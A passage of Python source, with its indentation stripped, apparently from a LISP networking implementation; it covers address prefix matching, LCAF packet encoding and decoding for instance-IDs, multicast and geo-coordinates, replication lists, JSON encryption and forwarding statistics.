if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON than
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
